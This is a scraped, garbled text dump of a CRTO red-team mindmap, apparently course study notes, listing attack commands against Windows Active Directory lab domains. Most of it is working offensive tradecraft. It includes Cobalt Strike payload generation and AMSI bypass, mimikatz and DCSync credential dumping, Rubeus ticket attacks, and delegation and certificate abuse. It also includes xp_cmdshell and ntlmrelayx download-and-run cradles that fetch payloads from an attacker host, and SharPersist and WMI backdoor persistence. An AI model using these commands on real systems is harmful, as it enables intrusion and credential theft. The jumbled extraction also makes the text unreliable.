0% found this document useful (0 votes)
148 views1 page

CRTO Mindmap

Uploaded by

Marc Vives
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
148 views1 page

CRTO Mindmap

Uploaded by

Marc Vives
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

‎Payload = Beacon HTTP/S

‎Port = 80/443

‎HTTP/S ‎HTTP Hosts = IP/domain

‎HTTP Host (stager) = IP/domain


‎Beacon => TeamServer
‎Egress
‎Payload = Beacon DNS

‎DNS Hosts = sub.domain.es


‎DNS
‎DNS Host (stager) = sub.domain.es

‎Listener Management ‎Payload = Beacon TCP

‎Port = XXXX
‎TCP
‎Yes = tcp-local (127.0.0.1)
‎Bind to localhost only
‎Beacon => Beacon
‎P2P ‎No = tcp (0.0.0.0)

‎Payload = Beacon SMB

‎SMB ‎Pipename (C2)

‎PS C:\> ls \\.\pipe\

‎ SVCPIPE-5a71ebb3-cc01-49a9-bd85-
T
‎4bbd37495169

‎Generate .hta
‎HTA (HTML Application)

‎Generate a VBA for Macros


‎MS Office Macro

‎ nly generates payloads for egress


O
‎listeners, but supports x86 and x64.
‎Stager Payload Generator

‎As above, include P2P.


‎Generating Payloads ‎Stageless Payload Generator ‎Generate All Payloads at the start

‎EXE, Service EXE or DLL


‎Starting CS ‎Windows Stager Payload

.‎EXE, Service EXE, DLL, shellcode, as well as


‎PowerShell. Only for P2P.
‎Windows Stageless Payload

‎ enerate every stageless payload variant,


G
‎for every listener, in x86 and x64
‎Windows Stageless Generate All Payloads

‎Right click on Beacon > Pivoting > Listener


‎Pivot Listeners

s‎ udo vim
‎/etc/systemd/system/teamserver.service
‎Running As a Service

.‎/agscript [host] [port] [user] [password] [script.


‎cna] ‎ls \\gpcfilesyspath\Machine ‎download registry.pol ‎Parse-PolFile .\Desktop\Registry.pol
‎GetConfig ‎User

‎ payload = artifact_payload("listener_
$
‎Headless CS ‎agscript ‎name", "payload_type", "arch"); ‎ owershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } |
p
‎select DisplayName, Name, GPCFileSysPath | fl
‎on ready{...} event ‎gpcfilesyspath
‎script.cna s‎ ite_host("ip_server", port, "/resource", $
‎payload, "text/plain", "description", false);
‎ owershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-
p
‎AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
.‎/build.sh pipe VirtualAlloc 277492 5 false
‎false /mnt/c/Tools/cobaltstrike/artifacts ‎LAPS ‎Powerview ‎Principals allowed to read Password
‎Disk ‎Artifact Kit ‎powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
‎System
‎Cobalt Strike > Script Manager > Load ‎psexec/psexec64
.‎/build.sh /mnt/c/Tools/cobaltstrike/ ‎powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
‎resources ‎Computers with LAPS
‎jump [method] [target] [listener(SMB)] ‎psexec_psh (32bits)
‎Memory ‎Resource Kit ‎jump
‎powershell Get-DomainComputer -Identity <Computer> -Properties ms-Mcs-AdmPwd ‎make_token .\LAPSAdmin Password
‎winrm/winrm64
‎ ost-ex {
p ‎Read password
‎Bypass ‎ set amsi_disable "true";
‎winrm
‎ ‎ owershell-import C:\Tools\LAPSToolkit\
p
‎ set spawnto_x64 "%windir%\\ ‎LAPSToolkit.ps1
‎sysnative\\dllhost.exe"; ‎psexec
‎ set spawnto_x86 "%windir%\\ ‎LAPSToolkit ‎remote-exec [method] [target] [command]
‎powershell Find-LAPSDelegatedGroups ‎remote-exec
‎syswow64\\dllhost.exe"; ‎cd \\target\share$
‎} ‎./c2lint c2-profiles/normal/webbug.profile ‎Restart
‎Cobalt Profile
‎upload paylaod-smb.exe
‎Movimiento lateral ‎wmi ‎link target pipe

r‎ emote-exec wmi target.domain C:\ ‎User


‎Windows\payload-smb.exe

‎ owershell Invoke-DCOM -ComputerName


p
‎Sysmon64 ‎wtarget -Method MMC20.Application -
‎Command C:\Windows\payload-smb.exe
‎Invoke-DCOM.ps1
‎MsMpEng (Defender)
‎Processes ‎ps
‎Web Credentials ‎spawn as
‎elastic-XXX ‎If credentials or user are interesting
‎run vaultcmd /list ‎Vault GUID
‎Vaults r‎ un vaultcmd /listcreds:"Windows
‎getprivs ‎Windows Credentials ‎Credentials" /all
‎Privileges
l‎s C:\Users\bfarmer\AppData\Local\
‎net logons ‎Microsoft\Credentials
‎User Sessions ‎DPAPI ‎BLOBS ‎mimikatz !sekurlsa::logonpasswords
‎MasterKey GUID
‎+
‎NTLM Hashes ‎pth Domain\User HashNTLM
‎-group=system l‎s C:\Users\User\AppData\Roaming\ ‎BLOB ‎logonpasswords
‎PTH
‎Microsoft\Protect\S-X-X-XX
‎ ow
H ‎MasterKey GUID ‎mimikatz !lsadump::sam
‎List Vaults ‎SAM
‎WindowsVault
‎DPAPI ‎mimikatz !sekurlsa::ekeys ‎aes256_hmac (first and large)
‎Kerberos AES256 Keys
‎WindowsCredentialFiles
‎ owershell Get-DomainComputer -Domain dev-studio.com -
p
‎Properties DnsHostName ‎mimikatz !lsadump::cache
‎Certificates
‎Get DC Server ‎Mimikatz ‎DCC
‎Seatbelt.exe ‎Certificates
‎JUMP
‎OSInfo -ComputerName=Hostname ‎ xecute-assembly C:\Tools\Rubeus\Rubeus\
e ‎execute-assembly C:\Tools\Rubeus\ ‎ xecute-assembly C:\Tools\Rubeus\Rubeus\
e
‎bin\Release\Rubeus.exe asktgt /user: ‎Rubeus\bin\Release\Rubeus.exe asktgs / ‎bin\Release\Rubeus.exe asktgs /service:cifs/ ‎Hashcat => $DCC2$<iterations>#<username>#<hash>
‎Pivoting ‎Inbound
‎ owershell Get-
p ‎ owershell Get-DomainGroupMember -
p ‎nlamb /domain:dev.cyberbotic.io /aes256: ‎service:krbtgt/dev-studio.com /domain:dev. ‎dc.dev-studio.com /domain:dev-studio.
‎DomainForeignGroupMember -Domain ‎ owershell ConvertFrom-SID S-1-5-21-
p ‎Identity "Studio Admins" | select ‎a779fa8afa28d66d155d9d7c14d394359c5d ‎cyberbotic.io /dc:dc-2.dev.cyberbotic.io / ‎com /dc:dc.dev-studio.com /ticket:doIFoz[...] ‎mimikatz lsadump::dcsync
‎TokenPrivileges
‎dev-studio.com ‎569305411-121244042-2357301523-1120 ‎MemberName ‎29a86b6417cb94269e2e84c4cee4 /nowrap ‎ticket:doIFwj[...]MuaW8= /nowrap ‎NPTQ== /nowrap
‎PrivEsc
‎Find users outside of its domain ‎Obtain members ‎Pwn user and ASKTGT ‎Referal Ticket ‎TGS for service in trusting domain ‎PTT ‎Jump Psexec ‎DCSync
‎Trusts ‎dcsync domain.controller.domain Domain\krbtgt
‎ DSearch.exe --search "(&(objectCategory=
A
‎ owershell Get-DomainObject -Identity "
p ‎ imikatz @lsadump::dcsync /domain:
m ‎ xecute-assembly C:\Tools\ADSearch\ADSearch\
e ‎ xecute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /
e
‎group)(cn=*Admins))" ‎mimikatz !sekurlsa::dpapi (as admin)
‎CN=msp.org,CN=System,DC=cyberbotic,DC= ‎cyberbotic.io /guid:{b93d2e36-48df-46bf- ‎bin\Release\ADSearch.exe --search "( ‎user:CYBER$ /domain:msp.org /rc4:f3fc2312d9d1f80b78e67d55d41ad496 /
‎Groups with "admins" ‎ imikatz dpapi::cred /in:C:\Users\USer\
m ‎Plain text password ‎make_token .\User Pass
‎io" | select objectGuid ‎89d5-2fc22c139b43} ‎objectCategory=user)" ‎nowrap ‎Impersonation
‎ ou need domain admin
Y ‎Masterkey ‎AppData\Local\Microsoft\Credentials\
‎Outbound ‎Obtain TDO ‎Search Trusts Accounts ‎ASKTGT ‎ imikatz dpapi::masterkey /in:C:\Users\
m
‎in trusting domain ‎DPAPI ‎BLOB /masterkey:key_obtained
‎ DSearch.exe --search "(&(objectCategory=
A ‎User\AppData\Roaming\Microsoft\Protect\
‎user)(servicePrincipalName=*))" --attributes ‎S-X-X-XX-\masterkeyGUID /rpc ‎More OPSEC, no lsass interact
‎cn,servicePrincipalName,
‎samAccountName ‎Admins=> all tickets
‎Kerberoasting ‎
‎Validate: ‎rev2self
‎Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap ‎ ubeus.exe createnetonly /program:C:\
R
‎Rubeus.exe triage ‎TGT => Service krbtgt/domain ‎Extracting Kerberos Tickets ‎Get ProcessID ‎steal_token ProcessID ‎ls \\web.dev.cyberbotic.io\c$ ‎Revert
‎Windows\System32\cmd.exe /domain:dev. ‎ ubeus.exe ptt /luid:0x798c2c /ticket:
R
‎ DSearch.exe --search "(&(objectCategory=
A ‎List Kerberos Tickets ‎kill ProcessID
‎cyberbotic.io /username:bfarmer / ‎doIFuj[...]lDLklP
‎Reconnaissance ‎user)(userAccountControl:1.2.840.113556.1.4.
‎TGS => Services/domain ‎password:FakePass123
‎803:=4194304))" --attributes cn,
‎ DSearch
A ‎ ubeus
R
‎distinguishedname,samaccountname ‎TGT/TGS ‎Pass The Ticket
‎ ‎
‎ASReproasting ‎ harpSpoolTrigger.exe target_machine
S ‎ ubeus.exe createnetonly /program:C:\
R
‎execute-assembly C:\Tools\ADSearch\ ‎execute-assembly C:\Tools\Rubeus\
‎ADSearch\bin\Release\ADSearch.exe ‎listener_machine (vulnerable on ‎Windows\System32\cmd.exe /domain:
‎Rubeus\bin\Release\Rubeus.exe ‎Unconstrained) ‎DEV /username:nlamb /password:
‎ DSearch.exe --search "(&(objectCategory=
A
‎computer)(userAccountControl:1.2.840. ‎Rubeus.exe monitor /interval:10 /nowrap ‎FakePass /ticket:doIFwj[...]MuSU8=
‎CRTO ‎113556.1.4.803:=524288))" --attributes ‎Force auth ‎Ends with job & jobkill
‎samaccountname,dnshostname ‎Admin on vuln machines
‎Unconstrained
‎ ubeus.exe s4u /impersonateuser:nlamb /
R
‎self /altservice:cifs/dc-2.dev.cyberbotic.io /
‎ DSearch.exe --search "(&(objectCategory=
A
‎TGT from machine account will fail ‎user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap / ‎Fails
‎computer)(msds- ‎dnshostname:machine
‎(Unconstrained) ‎ptt
‎allowedtodelegateto=*))" --attributes
‎S4U2Self ‎OK
‎dnshostname,samaccountname,msds-
‎ wn User Trusted for delegation (
P
‎allowedtodelegateto --json ‎Admin on dnshostname
‎SamAccountName) ‎ ubeus.exe s4u /impersonateuser:nlamb /
R
‎Constrained
‎ ubeus.exe asktgt /user:jking /ntlm:5...c /
R
‎msdsspn:cifs/dc-2.dev.cyberbotic.io /
‎NTLM ‎nowrap
‎Services allowed on machine ‎altservice:ldap /user:sql-2$ /ticket:doIFpD[...]
‎TGT ‎Use TGS/TGT for PTT
‎ GT of principal (user or machine) trusted
T ‎MuSU8= /nowrap
‎ ES256
A ‎ ubeus.exe asktgt /user:jking /aes256:4...c6 /
R ‎for constrained delegation ‎ ‎DCSync
‎ owershell $rsd = New-Object Security.
p
‎(More OPSEC) ‎domain:DEV /opsec /nowrap ‎/altservice
‎AccessControl.RawSecurityDescriptor "O:
‎BAD:(A;;
‎ ubeus.exe s4u
R
‎ owershell Get-DomainComputer | Get-
p ‎CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<
‎ ubeus.exe asktgt /user:jking /aes256:4...6 /
R ‎/impersonateuser:<user_to_impersonate>
‎DomainObjectAcl -ResolveGUIDs | ? { $_. ‎SID>)"; $rsdb = New-Object byte[] ($rsd. ‎Over Pass The Hash
‎OPTH+PTT ‎domain:DEV /opsec /nowrap /ptt ‎/msdsspn:<service allowed to delegate>
‎ActiveDirectoryRights -match " ‎BinaryLength); $rsd.GetBinaryForm($rsdb,
‎Machine TGT ‎/user:<principal TGT pwnd>
‎WriteProperty|GenericWrite|GenericAll| ‎Privs on computer ‎0); Get-DomainComputer -Identity "dc-2" |
‎ ubeus.exe asktgt /user:nlamb /certificate:<
R ‎/ticket:<TGT for /user> ‎OK
‎WriteDacl" -and $_.SecurityIdentifier - ‎ ‎Set-DomainObject -Set @{'msDS-
‎Base64Cert> /password:<cert_pass> (not ‎/nowrap
‎match "S-1-5-21-569305411-121244042- ‎ owershell ConvertFrom-SID S-1-5-21-
p ‎ owershell Get-DomainComputer -Identity
p ‎AllowedToActOnBehalfOfOtherIdentity' = $
‎Certificates ‎necessary) /nowrap ‎S4U (S4U2Self+S4U2Proxy) ‎Fails
‎2357301523-[\d]{4,10}" } ‎569305411-121244042-2357301523-1107 ‎wkstn-2 -Properties objectSid ‎rsdb} -Verbose
‎RCBD ‎TGT of machine trusted for RCBD
‎Whitout localadmin
‎ owershell Get-DomainTrust -Domain <
p ‎Rubeus.exe kerberoast /simple /nowrap
‎powershell Get-DomainTrust ‎Domain> (CHECK ALL)
‎Trusts
‎Kerberoasting ‎Opsec ‎Rubeus.exe kerberoast /user:user /nowrap ‎ owershell Get-DomainObject -Identity "
p
‎powershell Get-DomainComputer | ? { $_."ms-Mcs- ‎DC=dev,DC=cyberbotic,DC=io" -Properties
‎ sktgt /user:dc-2$ /certificate:MIIJuA[...snip...]
a ‎Check addComputers ‎ms-DS-MachineAccountQuota
‎Computers With LAPS ‎AdmPwdExpirationTime" -ne $null } | select dnsHostName ‎ICB9A= /password:"y52EhYqlfgnYPuRb" /
‎ owerView
P ‎Abuse ‎nowrap
‎Rubeus.exe asreproast /simple /nowrap
‎ ‎ owershell Get-DomainGPO | ? { $_.DisplayName -like "*
p ‎ tandIn.exe --computer EvilComputer --
S
‎LAPS
‎powershell-import C:\Tools\PowerSploit\ ‎LAPS GPOs ‎laps*" } | select DisplayName, Name, GPCFileSysPath | fl ‎gpcfilesyspath ‎make ‎Get Password
‎Recon\PowerView.ps1 ‎ASReproasting ‎ ubeus.exe asreproast /user:squid_svc /
R
‎Opsec ‎nowrap
‎powershell Find-DomainShare -CheckShareAccess ‎ ubeus.exe hash /password:
R
‎oIrpupAtF1YCXaw /user:EvilComputer$ /
‎SHARES ‎domain:dev.cyberbotic.io ‎Get AES256
‎powershell Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*

‎ ubeus.exe asktgt /user:EvilComputer$ /


R
‎GPOs ‎aes256:
‎7A79DCC14E6508DA9536CD949D857B54A
‎ owershell Get-DomainGroup -Identity *SQL* | % { Get-
p ‎ xecute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /
e ‎ xecute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /
e ‎E4E119162A865C40B3FFD46059F7044 /
‎DomainGroupMember -Identity $_.distinguishedname | select ‎target:dc-2$ ‎target:dc-2$ ‎nowrap
‎GetUsers from group that contains XXX ‎groupname, membername } ‎Shadow Credentials ‎Add new key
‎MSSQL ‎ owershell Get-DomainGPO -Identity "<ObjectDN>" | select
p
‎ owershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.
p ‎displayName, gpcFileSysPath ‎ harpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\
S
‎powershell Get-SQLInstanceDomain ‎ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier - ‎GPO ‎dns_x64.exe" --GPOName "Vulnerable GPO"
‎Discover Servers ‎AddComputerScript i‎nject any arbitrary shellcode from a binary
‎match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
‎Check modifiable ‎ owershell ConvertFrom-SID S-1-5-21-
p ‎ owershell Find-DomainShare -
p ‎ harpGPOAbuse
S ‎file on your attacking machine
‎569305411-121244042-2357301523-1107 ‎Find writeable share ‎CheckShareAccess ‎Upload payload ‎ ‎Rport Forward & rules FW (need admin) ‎shinject
‎ owershell Get-SQLInstanceDomain | Get-
p ‎gpupdate /force
‎ owershell Get-SQLServerInfo -Instance "
p ‎SQLConnectionTest | ? { $_.Status -eq " ‎OU ‎Modify ‎execute-assembly C:\Tools\ ‎Apply GPO
‎server.fqdn,1433" ‎Accessible" } | Get-SQLServerInfo ‎SharpGPOAbuse\SharpGPOAbuse\bin\ ‎Process Injection i‎nject a full Beacon payload for the
‎ harpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --
S
‎Get info ‎Check All Servers ‎Release\SharpGPOAbuse.exe ‎specified listener ‎inject PID arch P2PListenerName
‎ owershell Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" |
p ‎Command "C:\Windows\System32\cmd.exe" --Arguments "/c powershell -w hidden -enc EncBase64=" --GPOName "
‎select distinguishedName ‎AddComputerTask ‎Vulnerable GPO" ‎inject
‎ owershell Get-SQLConnectionTest -
p
‎Instance "server.fqdn,1433" | fl ‎Check what OU applies to GPO ‎powershell Get-DomainComputer -SearchBase "distinguishedname" | select dnsHostName ‎It is inmediate
‎Validate Connection
‎PowerUpSQL ‎GPOs ‎PowerView
‎ ‎Find writeable share
‎powershell Get-SQLQuery -Instance "sql-2.
‎powershell-import C:\Tools\PowerUpSQL\
‎dev.cyberbotic.io,1433" -Query "<query>"
‎PowerUpSQL.ps1 ‎powershell New-GPO -Name "Evil GPO"
‎Execute queries
‎ owershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.
p
‎powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433" ‎ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match " ‎ owershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -
p
‎Lateral Movement ‎ owershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -
p ‎WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType, ‎Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" - ‎Reboot
‎SecurityIdentifier | fl ‎Create ‎ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\
‎ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -
‎contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier } ‎dns.exe" -Type ExpandString
‎ owershell Invoke-SQLOSCmd -Instance "sql-2.dev.
p ‎ owershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,
p
‎Create ‎who can create ‎Check OU links ‎powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
‎cyberbotic.io,1433" -Command "whoami" -RawResults ‎1433" -Command "command (escape \")" -RawResults
‎Command Execution ‎ owershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,
p
‎DC=dev,DC=cyberbotic,DC=io"

‎SQLColumnSampleDataThreaded

‎SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami


‎Check our roles & rigths

‎ QLRecon.exe -a windows -s sql-2.dev.


S
‎SQLRecon
‎cyberbotic.io,1433 -m query -o "<query>"

‎Execute queries
‎execute-assembly C:\Tools\SQLRecon\
‎SQLRecon\bin\Release\SQLRecon.exe ‎Certify.exe cas
‎ QLRecon\bin\Release\SQLRecon.exe -a
S ‎Find CAS
‎ QLRecon.exe -a windows -s sql-2.dev.
S ‎windows -s sql-2.dev.cyberbotic.io,1433 -m
‎MSSQL ‎cyberbotic.io,1433 -m impersonate ‎iwhoami -i DEV\mssql_svc ‎ ave cert in cert.pem file
S
‎Check impersonation ‎msPKI-Certificate-Name-Flag ‎ENROLLEE_SUPPLIES_SUBJECT
‎(WSL)
‎ ertify.exe request /ca:dc-2.dev.cyberbotic.
C
‎Domain\mssql_svc ‎Check Kerberoasting ‎Enrollment Rights
‎Certify.exe find /vulnerable ‎io\sub-ca /template:CustomUser /altname:< ‎openssl pkcs12 -in cert.pem -keyex -CSP "
‎Search SPN for mssql service ‎Templates ‎user> ‎Microsoft Enhanced Cryptographic
‎Write Owner ‎Abuse ‎Provider v1.0" -export -out cert.pfx
‎SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'; ‎Permissions
‎Principal owned
‎Certify
‎WriteDACL ‎cat cert.pfx | base64 -w 0
‎Impersonation ‎SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals; ‎
‎ADCS ‎Base64 for Rubeus
‎execute-assembly C:\Tools\Certify\Certify\
‎bin\Release\Certify.exe ‎WriteProperty
‎EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
‎ xecute-assembly C:\Tools\SharpSystemTriggers\
e
‎SELECT srvname, srvproduct, rpcout FROM master..sysservers; ‎SharpSpoolTrigger\bin\Release\
‎sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server ‎SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
‎SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername'); ‎Relay ‎Config
‎Lateral movement
‎ ELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.
S ‎User
‎ ELECT * FROM OPENQUERY("sql-1.cyberbotic.
S
‎configurations WHERE name = ''xp_cmdshell''');
‎io", 'select @@servername; exec xp_cmdshell '' ‎Persistence ‎Computer ‎S4U2Self
‎powershell -w hidden -enc EncBase64 ''')
‎ roxychains mssqlclient.py -windows-auth
p ‎ XEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.
E ‎Beacon
‎Remote Code Execution ‎Binary Path
‎DEV/bfarmer@10.10.122.25 ‎cyberbotic.io]
‎Impacket-mssqlclient ‎Execute queries ‎run sc query (Service)

‎EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io] ‎Startup Type


‎run sc qc Service

s‎ p_configure 'Show Advanced Options', 1; ‎Service Status


‎RECONFIGURE; ‎run sc start Service ‎Check
‎ ELECT value FROM sys.configurations
S ‎Windows Services
‎Log On As
‎Enable xp_cmdshell ‎WHERE name = 'xp_cmdshell'; ‎run sc stop Service
s‎ p_configure 'xp_cmdshell', 1;
‎RECONFIGURE; ‎Dependants & Dependences
‎powershell Get-Service
‎EXEC xp_cmdshell 'whoami';
‎sudo ss -lpnt
‎Check if listen ‎upload service.exe
‎Execute command ‎ XEC xp_cmdshell 'powershell -w hidden -c "iex (new-
E
‎object net.webclient).downloadstring("""http://wkstn-2:
‎mv service.exe serviceVuln.exe
‎Beacon ‎8080/b""")"';
‎SharpUp.exe audit UnquotedServicePath
‎Visibilty, Rule & PortForward
‎Unquoted Service Paths ‎Create and upload .exe ‎run sc stop VulnService1
‎ harPersist.exe -t schtask -c "C:\Windows\
S ‎sudo vim /etc/proxychains.conf
‎System32\WindowsPowerShell\v1.0\
‎powershell.exe" -a "-nop -w hidden -enc ‎ roxychains nmap -n -Pn -sT -p445,3389,
p ‎run sc start VulnService1
‎Linux ‎Proxychains ‎ harpUp.exe
S ‎run sc qc NameVulnService
‎BASE64" -n "Updater" -m add -o hourly ‎4444,5985 10.10.122.10
‎Task Scheduler ‎ ‎Get vuln path
‎Socks 4 ‎socks 1080
‎execute-assembly C:\Tools\SharpUp\
‎Connect r‎ unas /netonly /user:DEV\bfarmer mmc. ‎SharpUp\bin\Release\SharpUp.exe
‎ harPersist.exe -t startupfolder -c "C:\
S ‎ServiceRights: ChangeConfig ‎upload C:\Payloads\tcp-local_x64.svc.exe
‎Socks 5 ‎socks 1080 socks5 disableNoAuth socks_user socks_password EnableLogging ‎Config ‎exe (powershell as admin) ‎powershell-import C:\Tools\Get-ServiceAcl.ps1
‎Windows\System32\ ‎Upload payload
‎Socks Proxy
‎WindowsPowerShell\v1.0\powershell. ‎SharpUp.exe audit ModifiableServices ‎Check ‎IdentityReference: myUser
‎Windows ‎Proxifier ‎Allow us to map ADCU => interesting for enum ‎ owershell Get-ServiceAcl -Name
p
‎exe" -a "-nop -w hidden -enc BASE64" -f " ‎socks stop ‎Weak Service Permissions ‎get Modifiable Services r‎ un sc config NameVulnService binPath=
‎NameVulnService | select -expand Access ‎If is vuln
‎UserEnvSetup" -m add ‎C:\Temp\tcp-local_x64.svc.exe
‎Startup Folder ‎run netstat -anp tcp ‎connect localhost 4444
‎rportfwd [machine_port] [Cobalt IP] [Cobalt Port] ‎Privilege Escalation ‎Reconfigure binary
‎Firewall rules (as admin) ‎Check if listen ‎CreateFiles privilege
‎Visibilty, Rule & PortForward
‎ harPersist.exe -t reg -c "C:\ProgramData\
S ‎Reverse Port Forward ‎rportfwd stop ‎run sc stop NameVulnService
‎SharpPersist.exe ‎Payload.exe" -a "/q /n" -k "hklmrun" -v " ‎ ny user logon
A
‎ServiceName" -m add ‎(SYSTEM privs) ‎search unquoted and spaced paths ‎download service.exe
‎ owershell Get-Acl -Path "C:\ServicePath\
p ‎Stop and then start the service ‎run sc start NameVulnService
i‎ f P2P ‎Pivoting ‎rportfwd 8445 localhost 445 ‎Unquoted Service Paths ‎run wmic service get name, pathname
‎Service-file" | fl (find a file writeable)
‎Connect / Link
‎ harPersist.exe -t reg -c "C:\ProgramData\
S ‎copy "tcp-local_x64.svc.exe" "service.exe"
‎Registry Autorun ‎rportfwd 8080 localhost 80 ‎PortForward
‎Payload.exe" -a "/q /n" -k "hkcurun" -v "
‎ServiceName" -m add ‎Specify user logon ‎Modify privilege
‎run sc stop service.exe
‎socks 1080 socks5 disableNoAuth socks_user socks_password EnableLogging
‎Use SVC payload ‎upload tcp-local_x64.svc.exe ‎upload service.exe
s‎ udo proxychains ntlmrelayx.py -t smb://10.10.122.10 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc
‎Firewall rules (as admin) ‎aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQA
‎mv tcp-local_x64.svc.exe legit-svc.exe ‎NTLM Relaying
‎ ervices
S ‎cwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAyADMALgAxADAAMgA6ADgAMAA4ADAALwBiACIAKQA=' ( ‎Weak Service Permissions
‎( OK 4 privs) ‎no cobalt ip)
‎Host Persistence
‎ harPersist.exe -t service -c "C:\Windows\
S
‎legit-svc.exe" -n "legit-svc" -m add ‎run netstat -anp tcp ‎Weak Service Binary Permissions
‎Reboot ‎connect localhost 4444 ‎cd C:\Windows\system32\drivers

‎elevate uac-schtasks tcp-local ‎run sc start NameVulnService3


‎upload C:\Tools\PortBender\WinDivert64.sys ‎UAC Bypasses ‎Elevate Kit ‎NT Authority\System
‎COM Hijacks ‎PortBender redirect 445 8445
‎Portbender (SYSTEM)
‎ obalt Strike > Script Manager > load
C ‎Seatbelt.exe TokenPrivileges ‎SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc EncBase64"
‎powershell-import C:\Tools\PowerLurk.ps1
‎PortBender.cna ‎SweetPotato.exe ‎SeImpersonatePrivilege
‎EventConsumer ‎ owershell Register-MaliciousWmiEvent -
p ‎Create ‎powershell New-NetFirewallRule -DisplayName "8445-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445
‎EventName WmiBackdoor -
‎WMI Event Subscriptions ‎EventFilter ‎PowerLurk.ps1 ‎PermanentCommand "C:\Windows\dns_ ‎Firewall rules (as admin)
‎x64.exe" -Trigger ProcessStart - ‎Delete ‎powershell Remove-NetFirewallRule -DisplayName "8445-In"
‎ProcessName notepad.exe
‎FilterToConsumerBinding ‎

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy